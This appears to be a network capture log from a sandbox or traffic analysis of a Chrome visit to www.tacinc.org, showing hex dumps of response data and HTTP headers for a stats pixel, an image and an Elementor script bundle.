                                                                                                                                                                                                                              2024-10-23 18:04:14 UTC1369INData Raw: 3e d2 db 40 ec 1b 64 f2 69 c8 c0 d3 73 93 08 1b 73 bc ef f2 ef 3b c1 c8 77 14 75 7b aa 40 ae 3a e7 fe 79 d1 9e 74 d3 ce 9e 79 d5 93 ce 6c 9e 73 6c 3d 66 e9 e7 57 c3 d6 72 0c f3 8c 89 e6 f9 33 cd b2 bd a7 9a e5 43 d5 32 a3 37 26 d9 ed 35 3b 4d 09 a9 a1 0c 13 53 53 53 50 c2 75 2d bf 67 8a af b9 84 6e 68 40 d3 70 34 0c 26 d6 06 8a 54 fb 4e df e0 54 ef 73 9b 6f 47 91 9c 8c d9 9b 9b 33 66 02 c3 b4 db 4d 99 b9 b3 37 f2 fe ff 00 c7 7f 23 dc cd 81 2f c8 f0 bb 9d d9 ef 3e a4 c3 95 05 85 c6 c5 81 c8 63 10 76 8a 3b c2 26 a2 66 d4 d0 5a b0 38 33 94 0d 39 4d c0 ce 20 b0 c0 f0 3c e7 39 4e c6 6f 52 bc 7b ad 1c 93 e8 f2 61 e9 79 46 f0 d3 e8 b2 67 d0 e5 4f a0 cb 30 60 66 4f 2f cb 9e 5f 97 3c bb 30 c1 d3 b3 27 96 e6 4b ea b7 1d f8 d9 ca 72 9c e7 33 39 98 6c 30 39 9c cc 65
                                                                                                                                                                                                                              Data Ascii: >@diss;wu{@:ytylsl=fWr3C27&5;MSSSPu-gnh@p4&TNTsoG3fM7#/>cv;&fZ839M <9NoR{ayFgO0`fO/_<0'Kr39l09e
                                                                                                                                                                                                                              2024-10-23 18:04:14 UTC1369INData Raw: f6 41 f8 a7 2e 9c 9e a8 1e a7 c8 df 29 d3 fd 5d 13 a9 4e 86 3f 51 e7 53 1f bb 12 8e a3 f4 79 b5 56 9d 47 3f 23 27 c3 0d d3 4f fc 85 e2 3d b7 33 ca 4d ad 75 3c ba d7 f2 6d d7 49 fb e6 c0 02 01 b9 a2 74 26 5b fe c2 d5 8d f7 4c de f6 d9 1b be 3a 4a bf 13 4a 07 23 a8 94 64 78 aa 17 3e a6 a0 f8 6e 3f a9 84 3d e6 48 fd 66 82 7c 27 91 5d 19 19 1c fe 22 ba 9b 7a 9e 45 94 f8 ed b0 0e 0f c5 3d 37 1b 0f 16 97 e8 59 d7 e6 d1 71 b7 af 75 33 81 8c 05 78 dd 7b 2d db 8d b8 cf 95 63 b5 55 65 bd f4 bd 75 db d1 3e 21 af 16 9b a9 ca 1f 13 74 96 0c 47 5f eb e9 d4 9d 29 4c 9b 69 b8 68 63 7e 8f bf c3 fd 49 7a 7e 2f 50 53 f1 37 5a 16 8a f1 71 ab c8 c9 c7 c9 af 22 be b1 d5 7c df a0 07 c7 3c b7 a9 67 2f f6 f0 89 1b 82 ea 71 3a 53 50 7a 27 6b 1c 1e a0 a6 dc ea d1 2d 4f 0f 30 bd 87
                                                                                                                                                                                                                              Data Ascii: A.)]N?QSyVG?#'O=3Mu<mIt&[L:JJ#dx>n?=Hf|']"zE=7Yqu3x{-cUeu>!tG_)Lihc~Iz~/PS7Zq"|<g/q:SPz'k-O0
                                                                                                                                                                                                                              2024-10-23 18:04:14 UTC1369INData Raw: 37 d6 52 ea 4c c3 3a ea 0a 66 08 ef 5a ca 0e fa 86 38 9d 4b f9 b9 33 0f f3 a4 07 b4 13 73 2c 77 f9 19 fe b0 7b 18 7e 4b ef 39 02 ae 0d 1d d4 c7 5a 8b ee 5d 92 75 df a5 1c 73 ae 16 5b 50 52 ac f5 62 ab 3e 23 81 91 8c da 7e a7 67 2b 55 46 16 fc 75 13 a8 d1 52 22 32 e8 c0 b0 c5 ad da a4 b1 68 51 e1 59 cf a7 a2 92 14 e6 f1 4a 9c ce 92 2c 19 36 b8 46 ef 69 99 95 9b 7a 7e 09 34 a3 d7 59 ae da 19 6b ea 0f ab d7 4c 67 2d 09 55 3d 89 74 4e 37 2e af a4 86 79 8a 3c 66 f0 a7 54 42 99 18 c2 62 7f d8 ac a6 a1 5b a3 cc 25 de 7e 3b 4e a7 fc dc 99 86 37 7a 4f ea 0e df 2c bf fd f9 37 bc ff 00 41 fe 02 0f bb be 3f 12 36 a3 bf 88 26 50 f6 59 52 57 48 e3 34 59 c4 bf 19 8e 8a 50 ce 4b 06 b1 f9 bb 34 47 35 d8 ae bd 59 cb 9a 0c 06 72 8c 76 65 14 a3 57 8e 0d f8 54 f0 ed 50 e3 7f
                                                                                                                                                                                                                              Data Ascii: 7RL:fZ8K3s,w{~K9Z]us[PRb>#~g+UFuR"2hQYJ,6Fiz~4YkLg-U=tN7.y<fTBb[%~;N7zO,7A?6&PYRWH4YPK4G5YrveWTP
                                                                                                                                                                                                                              2024-10-23 18:04:14 UTC1369INData Raw: d9 49 0b 8f 81 92 3d eb e9 cf 67 67 3d 3f c2 42 16 bc 72 aa bb b1 0d dc 56 59 8a fe 16 e3 57 a1 38 c0 bd a1 5f 54 ea 45 97 36 f4 af 36 df d9 d4 57 18 b2 e4 d5 ba 17 4f 2e 5f 54 ad 3d 71 07 bc 7a d8 97 59 87 95 6e 05 e5 a5 0e b6 3f 34 f8 a7 f0 e3 4c 1f e4 d5 30 ff 00 02 7c b3 ba 66 3e 76 8b 4a 75 cf 46 b7 aa 90 39 37 51 76 13 eb 2c 8b 92 49 ef 89 93 8f 45 80 dd 97 75 16 e3 a9 a0 4a f5 a8 d0 6a 62 7b dc 25 c8 ef d3 f2 8c c7 47 45 0a fd 3d 38 d0 86 76 ed ab 13 5b 13 42 70 07 ee 18 f8 d5 fe 3f 0f 51 6b ef 19 76 b3 8e 96 22 6d 96 36 3d a6 be d6 21 1b 04 ac 55 ed 0a 7a a5 b8 0e a6 c7 a3 22 8b 7e 99 a9 7a 70 ef c5 cb af ea 97 22 a0 dd ac b6 bd c4 b1 39 4a af 52 f1 2e a5 ed 9d 4e 9a 87 ad 7a 76 68 c7 b8 2b 7c 51 de 8c 69 83 fc 8a e6 27 6a 17 fc 31 f0 2e b9 3c 45
                                                                                                                                                                                                                              Data Ascii: I=gg=?BrVYW8_TE66WO._T=qzYn?4L0|f>vJuF97Qv,IEuJjb{%GE=8v[Bp?Qkv"m6=!Uz"~zp"9JR.Nzvh+|Qi'j1.<E
                                                                                                                                                                                                                              2024-10-23 18:04:14 UTC1369INData Raw: ff 00 a9 73 8f 63 c1 95 2e e6 5b 1f 75 cd f8 5b 85 cc 3f 29 e7 bd ad 53 1a 49 19 ad f8 82 6a 17 04 15 ab a3 c4 a6 35 e5 dc c9 e6 a7 72 bf 88 19 7f 52 b6 24 13 98 25 5b 39 de 69 c4 fd ca 85 0a 11 08 84 e4 fc 4b 91 6c 2e e7 3f 9b fa ae 61 ec 6e 08 ad db 76 eb 62 b7 bb a2 de ed d0 39 66 13 ea b7 bd a5 59 b9 59 b9 32 3a 95 6b 67 08 62 1b 85 64 55 93 bc 90 22 0a b1 76 41 30 83 59 9e a8 0a 20 13 47 9a 60 f3 4c 1f 72 13 5b e6 15 89 74 6c ac 4b 5b b9 5b af a4 b6 0b 65 cc 6e 0b e5 90 57 37 e0 a7 c2 7c f8 26 ae 66 dd ce 57 55 bf 0e f7 f6 80 68 30 7c 61 35 cc 09 e0 d3 65 65 d9 83 db 19 26 84 10 4d 71 68 74 50 51 35 de 45 31 c9 9e a9 8e 15 d4 28 c9 73 85 63 68 f0 1c 6a d6 ca fe 1a db f6 15 fc 2d bc 46 78 0a fe 12 df 2e 42 bf 82 b7 fd 85 59 39 8f 3a 38 2b 52 08 d9 0a
                                                                                                                                                                                                                              Data Ascii: sc.[u[?)SIj5rR$%[9iKl.?anvb9fYY2:kgbdU"vA0Y G`Lr[tlK[[enW7|&fWUh0|a5ee&MqhtPQ5E1(schj-Fx.BY9:8+R
                                                                                                                                                                                                                              2024-10-23 18:04:14 UTC1369INData Raw: 64 78 4a e7 2b 99 49 ed af a8 ba f0 6d 7e fc 26 a0 02 3a 95 ba 6d 64 22 00 0a d4 38 78 c2 c2 41 19 12 9e 19 f3 d8 5a 4e 9c a5 48 07 27 68 51 98 15 42 65 37 0b 8b b2 e0 66 42 0c 2b 20 71 4d 48 ca 33 42 08 59 41 4d 30 2c 1d 26 ec 99 64 ef 57 14 3b 80 7d a4 03 f9 55 c4 09 17 04 57 54 29 25 67 02 16 94 f2 72 fa 85 6a 2d 3f b6 ab 98 15 cf c3 b5 fb f1 0a 15 ba 39 95 9e e9 d4 dd 1c 44 22 e2 d6 88 12 72 e8 b7 59 b4 a9 12 cc b8 1b 0e 81 92 00 0e 9a ad 42 e8 88 6b 70 d4 0d 56 e9 a1 c6 98 c4 56 ae d1 38 1f 8c 5c ef 0c 84 28 cc b4 dd cc 2e ce 0a 6b b1 cc 00 98 44 c4 1e b2 b2 75 b1 23 ef 55 9f c5 42 8d 36 8b 4b 50 02 e7 fc 2d f8 3e 5a 5f bf 17 92 ee 92 ab 59 4e 8f 14 01 f5 4e 68 e8 a4 17 fa dd 63 13 1d b3 59 f0 08 9d 6f ee 8a 94 7b 57 3e 8e 3a e8 9d 2d e8 8c 00 15 4c
                                                                                                                                                                                                                              Data Ascii: dxJ+Im~&:md"8xAZNH'hQBe7fB+ qMH3BYAM0,&dW;}UWT)%grj-?9D"rYBkpVV8\(.kDu#UB6KP->Z_YNNhcYo{W>:-L
                                                                                                                                                                                                                              2024-10-23 18:04:14 UTC1369INData Raw: fc 91 ae 61 ae 5f bc 09 65 0c 17 f7 ec 42 44 ca 55 44 15 60 55 fc e2 a4 0b 66 5d ea 56 30 ea a6 36 82 ea 5e 60 f4 10 80 77 89 dc 4d 38 89 01 93 37 98 58 d3 9b 46 23 98 dd 3f 3a 3c 01 f2 c7 82 21 88 52 c7 8e 0c de 1c ec 28 c3 d8 9b 27 c6 74 47 b4 74 4b b0 8d 58 2b da 3a 75 ed 08 fe 8c 71 54 d8 b4 8b 99 91 8f a3 11 fe 32 87 1f 68 a6 8f b4 ad 64 7e e3 a0 fb 25 23 2e 01 a7 8e f1 1d 7f 51 1f e9 1e 7f 92 28 d8 3c 4e cf 92 08 b4 c5 42 2b be 48 11 15 4b 2c a0 1c 19 63 01 e9 21 db fa 81 d3 c9 89 32 5b bb 0d 05 af 37 99 56 14 03 97 33 0a 9d 97 30 0d 30 1d 19 42 e9 e4 9d a5 4a e3 cb 16 49 ba bb 38 ed 50 0b 4b 8c c2 01 44 0e 94 5f a4 3c 24 bd 5f 36 25 41 1a 52 fe 37 0e 6f b2 13 ed 43 2e c1 36 a6 0a 5e b2 e8 de ab e9 ff 00 31 2c 2f f8 c5 0c 2f c4 a6 ad e2 29 ff 00 09
                                                                                                                                                                                                                              Data Ascii: a_eBDUD`Uf]V06^`wM87XF#?:<!R('tGtKX+:uqT2hd~%#.Q(<NB+HK,c!2[7V300BJI8PKD_<$_6%AR7oC.6^1,//)
                                                                                                                                                                                                                              2024-10-23 18:04:14 UTC1369INData Raw: c9 7d c8 ca 9b 02 a9 71 c5 cb d1 ce 0b 87 45 62 18 2c 81 4d ac 55 30 12 60 a9 b6 a9 f9 65 a5 e2 cb 91 9b 7f 24 11 7d 88 0a a0 3c ad 40 8a 52 28 d2 6f b2 c2 d7 e0 37 e3 09 52 55 28 22 72 e4 1a 2a d8 8c 8c 91 49 7a 6a 1e 00 95 c2 8d ab 25 9e d7 e0 c1 9b b2 45 99 68 2d 78 0a dc 67 5b 7d f5 0c 4e 20 2a 00 a9 03 8c 82 40 8a 89 2e 82 b1 9d de 7f a9 6f 4e 7e 49 ce 3a 4a 1f 40 86 9e b6 49 be c3 f1 88 4a d1 88 d8 5b 6a 65 71 d1 23 4f b0 c2 14 ac da 11 5e a9 0a 65 6f 73 01 14 2f 04 5c 88 14 b7 99 62 24 ad c3 cb 0d e8 33 6c 18 39 02 53 d9 b6 a7 51 12 75 1b 22 1e 0b 31 72 ea 07 1c 0a 16 c3 ec a5 b9 10 2b dd c4 18 17 85 94 5f 11 71 bd 16 33 5c 2c 2c 88 96 0d 41 c3 00 69 0a 00 de ac 22 3a 70 55 40 8c a5 1d a9 05 02 8a 10 21 70 19 64 5e a3 25 66 9d 34 f5 94 a9 b2 d4 83
                                                                                                                                                                                                                              Data Ascii: }qEb,MU0`e$}<@R(o7RU("r*Izj%Eh-xg[}N *@.oN~I:J@IJ[jeq#O^eos/\b$3l9SQu"1r+_q3\,,Ai":pU@!pd^%f4


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              146192.168.2.649883192.0.76.34431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:13 UTC699OUTGET /g.gif?v=ext&blog=228569162&post=7&tz=-4&srv=www.tacinc.org&j=1%3A13.9.1&host=www.tacinc.org&ref=&fcp=7473&rand=0.7742469349941385 HTTP/1.1
                                                                                                                                                                                                                              Host: pixel.wp.com
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                                                              Referer: https://www.tacinc.org/
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              2024-10-23 18:04:14 UTC222INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:14 GMT
                                                                                                                                                                                                                              Content-Type: image/gif
                                                                                                                                                                                                                              Content-Length: 50
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              2024-10-23 18:04:14 UTC50INData Raw: 47 49 46 38 39 61 06 00 05 00 80 01 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 06 00 05 00 00 02 09 0c 62 78 89 cd 6a 80 0c 05 00 3b
                                                                                                                                                                                                                              Data Ascii: GIF89a!,bxj;


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              147192.168.2.649892141.193.213.104431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:14 UTC902OUTGET /wp-content/uploads/2023/03/featImg_YAB-Series-Expanded-Edges@2400x1350px-367x266.png HTTP/1.1
                                                                                                                                                                                                                              Host: www.tacinc.org
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                                                              Referer: https://www.tacinc.org/
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1; _gid=GA1.2.1313925292.1729706650; _gat_UA-26451691-1=1; _ga_VZFP9C0M5Y=GS1.1.1729706650.1.0.1729706650.0.0.0; _ga=GA1.1.2026524419.1729706650
                                                                                                                                                                                                                              2024-10-23 18:04:14 UTC581INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:14 GMT
                                                                                                                                                                                                                              Content-Type: image/webp
                                                                                                                                                                                                                              Content-Length: 7624
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                              Cf-Bgj: imgq:100,h2pri
                                                                                                                                                                                                                              Cf-Polished: origFmt=png, origSize=8487
                                                                                                                                                                                                                              Content-Disposition: inline; filename="featImg_YAB-Series-Expanded-Edges@2400x1350px-367x266.webp"
                                                                                                                                                                                                                              ETag: "64d5113e-2127"
                                                                                                                                                                                                                              Last-Modified: Thu, 10 Aug 2023 16:33:02 GMT
                                                                                                                                                                                                                              Vary: Accept
                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                              Age: 613459
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8d73a5fc3eb5475d-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              2024-10-23 18:04:14 UTC788INData Raw: 52 49 46 46 c0 1d 00 00 57 45 42 50 56 50 38 4c b3 1d 00 00 2f 6e 41 42 00 87 c1 26 00 c0 24 f3 11 41 43 70 f3 11 82 e2 bc 5a 61 ee 52 83 6d 64 db 4a 70 08 c9 3c 23 24 a2 17 9a 76 e9 c1 dd f5 7d 61 1b 00 60 99 1a a3 8d c9 ff ff d2 2f 62 a7 98 ff e8 f4 af 77 c1 5c 54 84 47 02 cb fd 96 dc 19 73 4b 62 46 58 d9 6a 45 61 e0 52 9c 4b 70 2e 81 d9 10 60 5c ff 7d f3 98 73 84 b3 98 b1 c0 28 8c 49 40 14 c2 24 42 80 6a d9 5d 8b c8 c8 d8 aa e4 d5 e8 2f c3 a3 a0 47 f1 2e 87 18 59 8d da a4 95 8c b3 f8 56 ee 1e b1 4b f9 a1 11 c8 ee aa da ad 4d 8a 80 8e d8 e3 cc e8 c7 ce 60 64 1c 03 01 cb 8c f7 4f 8d 67 88 88 09 00 54 6d 3e 7a d0 2f 07 58 7c bc 9c bf eb 6c 5a b2 ad 46 92 a4 df da 82 24 12 af 69 ff 8b cc f4 8c 74 01 42 aa 1e b9 11 fd 97 05 db 6e dc 36 97 20 41 82 90 b2 50
                                                                                                                                                                                                                              Data Ascii: RIFFWEBPVP8L/nAB&$ACpZaRmdJp<#$v}a`/bw\TGsKbFXjEaRKp.`\}s(I@$Bj]/G.YVKM`dOgTm>z/X|lZF$itBn6 AP
                                                                                                                                                                                                                              2024-10-23 18:04:14 UTC1369INData Raw: 0b 23 a5 b8 28 bf 8f 0a 2a 25 ae 5e c9 b2 e7 09 a7 26 89 6d 86 26 60 51 4a 8d 9b 57 8c 42 b9 d7 dd 9f 2a ef 21 87 b4 34 24 ca 96 0e 86 ec 73 2a c1 0b 5f 1c 18 b7 02 02 18 8a bf 14 03 37 12 4c 8c 78 00 9a 7a 7c 37 15 19 2c c8 ae 1d 5b c3 6c d7 72 f4 e8 1e 4e d5 23 d9 87 d3 f9 28 ca b1 de 8c 63 b6 61 ec fc c5 3a 36 96 59 e5 7e b4 c1 62 1c 3f 24 4e 28 48 f3 80 14 2a 54 47 88 7a 21 54 52 00 bd fb 13 d9 72 6f 61 64 7d c8 dc 1b 66 7f 11 66 b6 cf 35 70 cd a6 d0 fc b2 c1 fb cb eb 4d e3 6a 92 01 f4 b5 7b 6f ea 1b db 47 28 f5 21 1b c7 3a f1 29 c4 05 80 11 d6 e5 64 c4 93 da a0 98 36 b4 6d 79 b7 67 11 d4 d1 cb 13 4d ce d7 bb b4 0d 84 46 33 ea 0c 1e 04 a2 58 80 69 a8 c0 8e f7 f1 b3 4e 25 f6 e7 5f ea 80 35 32 be da 9e da 7b d5 7b 41 86 04 d2 54 3d 61 18 24 26 e0 1a a9
                                                                                                                                                                                                                              Data Ascii: #(*%^&m&`QJWB*!4$s*_7Lxz|7,[lrN#(ca:6Y~b?$N(H*TGz!TRroad}ff5pMj{oG(!:)d6mygMF3XiN%_52{{AT=a$&
                                                                                                                                                                                                                              2024-10-23 18:04:14 UTC1369INData Raw: 5d f7 38 e2 3b 76 3a be f1 6b a3 cb 79 88 34 03 33 1b 36 4b 7a ac 29 3a cb fc e0 f1 f4 85 5f f8 fa 09 89 1e 0a 11 66 11 a2 40 e4 75 2d 6b e6 7a 6f 0f 35 be 33 27 fa 21 c6 cf ba a3 73 eb 7f 98 a6 98 82 c2 67 cc b0 fe f7 46 77 60 28 da be f2 06 71 5f 5a 99 f7 f6 aa f1 99 36 72 67 0e bc e7 6d 11 59 e3 53 82 73 d8 42 ba fa fb 5a d6 ad 9e 95 ea d1 a5 a4 e0 b5 25 63 9b b7 d9 2b c2 1d 8e ca 31 2b c1 d1 27 fb d7 80 f3 5c fe 0e 9b e3 c7 93 3b b4 07 c7 60 4d fc b2 4f 7a 43 f8 c3 78 46 1a 80 9c 62 60 de f3 b7 e1 db df dc 58 8d eb b0 4c e4 c2 b3 ca d1 4f 74 87 f9 8a 3e eb 7c 57 30 77 b2 5c f8 95 7b bc ba e3 3f 08 73 6d fd 23 9a 4e c4 e7 9b 4d e6 41 27 ad d8 e4 57 0c 83 b7 7a 13 32 e8 b7 fc 90 74 2b 73 5e f1 0e 87 23 f3 f6 c5 03 8c 9f fa e7 34 51 e2 74 33 a9 e8 8f 90
                                                                                                                                                                                                                              Data Ascii: ]8;v:ky436Kz):_f@u-kzo53'!sgFw`(q_Z6rgmYSsBZ%c+1+'\;`MOzCxFb`XLOt>|W0w\{?sm#NMA'Wz2t+s^#4Qt3
                                                                                                                                                                                                                              2024-10-23 18:04:14 UTC1369INData Raw: 83 be b7 60 d7 b9 96 f1 56 8f b7 94 96 94 b0 f1 de be 99 87 cb 7c 47 26 44 3a 8e 65 37 62 c5 88 a8 2d b5 fe 06 12 5c 9e f0 bb c4 a9 b1 b8 ad 12 12 09 98 82 d7 02 57 f0 79 83 6c 58 96 7b 35 f9 be cd 42 11 0e 93 ca e6 c0 fe f2 8e cd 83 d5 07 a0 84 50 57 12 77 b4 30 c8 3d 82 b9 e2 5d 7c 40 c4 20 3c 6b 7a f3 d7 59 4d 06 fb 1e f8 ab e0 32 54 84 98 77 d6 5c 39 20 84 63 82 c0 29 89 93 f8 e8 42 05 5c 08 b1 91 f3 04 a5 e6 32 a3 73 25 72 bf e4 ed d9 70 52 47 27 76 9a 98 66 d9 1d 1a 5d 08 52 76 af 45 fc 46 2f 4a b8 68 11 85 d7 1d 8c 5e 96 1c 17 2d 5b 3d 89 fe d4 43 ad 03 9c 36 a5 cd 90 fb 21 2f b4 7a 63 e2 98 c2 07 aa 60 3d 24 7b 07 d7 46 61 1d 71 9e 12 55 48 24 33 be eb 58 44 b2 63 91 7f 08 60 6d 81 9e b4 63 a3 2d b3 4e fd 23 3e f2 11 a1 4f 28 17 ef d1 e8 b5 12 66
                                                                                                                                                                                                                              Data Ascii: `V|G&D:e7b-\WylX{5BPWw0=]|@ <kzYM2Tw\9 c)B\2s%rpRG'vf]RvEF/Jh^-[=C6!/zc`=${FaqUH$3XDc`mc-N#>O(f
                                                                                                                                                                                                                              2024-10-23 18:04:14 UTC1369INData Raw: 8c 4f 4a 8e d3 53 89 d6 2d e1 f2 84 90 e3 81 9e 14 b0 43 e0 2a 38 e4 86 ee 75 05 fb 70 a0 12 e4 e8 a5 59 79 1c 75 92 45 0b 28 02 d6 1c d3 a9 26 ae cc ae 4a 15 ef 4a 91 e4 13 2d 39 42 a5 17 3d bd 1c e3 5b a2 87 26 ae 54 2b c6 df 3b 39 76 91 73 a8 79 6c fb 68 1f c6 9e c1 4d 0a a9 14 05 84 7e fb bd 3d d6 19 06 cd cb 84 09 bb f4 42 62 95 3d 28 03 6f 4d 65 25 12 56 24 3d e4 93 eb 8f 76 1f 91 10 20 67 1c db 73 25 16 93 71 5b bb dc 23 17 ed d9 0b e2 c2 a0 58 bb 2e bd cd 53 b5 58 0b af eb f4 c2 04 cf fe 9a 13 64 8a f6 d5 0b b7 67 46 4c e8 2a ab 81 f5 de 37 10 05 66 2f e9 b2 ee 58 75 16 5a 80 db 26 99 54 e3 99 4a 13 69 a0 17 a6 4c 7b 78 a4 2a 56 96 08 76 15 57 2d c2 80 1e 35 2c 41 b7 16 b5 16 d4 52 24 54 13 fd 13 2d eb c7 6c f4 03 f8 f1 d5 be fb 59 15 f7 62 7d 5d
                                                                                                                                                                                                                              Data Ascii: OJS-C*8upYyuE(&JJ-9B=[&T+;9vsylhM~=Bb=(oMe%V$=v gs%q[#X.SXdgFL*7f/XuZ&TJiL{x*VvW-5,AR$T-lYb}]
                                                                                                                                                                                                                              2024-10-23 18:04:14 UTC1360INData Raw: c1 be a0 64 6e 7e fd 78 5e cc 16 66 f2 4d 31 cd 5a af 8c 1c 24 95 8f 7c 59 bf 3e 9b f5 3c ef 03 c8 cf 0f 82 1d 93 5c bd af 3f 48 2e 96 5e d3 55 75 1a 34 98 50 6d 7d 30 10 7c 15 2b d1 b4 59 ae 0a 98 ce e4 95 17 3a a8 a4 ad f2 60 01 33 1b 78 55 89 b7 02 4c 0c a4 e5 9d e9 da 30 3a 66 e6 87 36 f9 02 60 48 29 5f 36 ef 6a 0f b0 de 64 d5 93 b1 51 ab ff 37 56 3d fb fe 64 4f af de 67 95 2a f7 cb 7a 3d ff f3 05 9e 3f f1 57 c9 c2 16 be 88 99 0d a1 17 d5 46 77 e4 3c e4 b0 0b 16 0e f4 a7 d3 db 55 9e 89 48 03 74 8b d9 54 5f 0e 8c ac d9 3e 0f d1 65 c6 73 6f 3f 21 a9 ef 9c 7d 0e 11 c8 7c a1 da de 39 3a 87 28 be 36 69 bd 7d 16 a8 c5 bd b1 f7 84 7c 8b 27 81 5a dc 1d bb c0 0f f6 ed 03 d0 21 0c d8 d5 de 12 1e e7 6b 1a 79 6a 2e 6f 69 f6 81 27 e0 e0 ad a8 a6 fa d1 a6 6c 1e 60
                                                                                                                                                                                                                              Data Ascii: dn~x^fM1Z$|Y><\?H.^Uu4Pm}0|+Y:`3xUL0:f6`H)_6jdQ7V=dOg*z=?WFw<UHtT_>eso?!}|9:(6i}|'Z!kyj.oi'l`


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              148192.168.2.649893141.193.213.104431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:14 UTC923OUTGET /wp-content/plugins/elementor/assets/js/text-editor.2c35aafbe5bf0e127950.bundle.min.js HTTP/1.1
                                                                                                                                                                                                                              Host: www.tacinc.org
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                              Referer: https://www.tacinc.org/
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1; _gid=GA1.2.1313925292.1729706650; _gat_UA-26451691-1=1; _ga_VZFP9C0M5Y=GS1.1.1729706650.1.0.1729706650.0.0.0; _ga=GA1.1.2026524419.1729706650; cookielawinfo-checkbox-necessary=yes; cookielawinfo-checkbox-non-necessary=yes
                                                                                                                                                                                                                              2024-10-23 18:04:14 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:14 GMT
                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Last-Modified: Tue, 15 Oct 2024 16:58:20 GMT
                                                                                                                                                                                                                              ETag: W/"670e9f2c-550"
                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                              Age: 613458
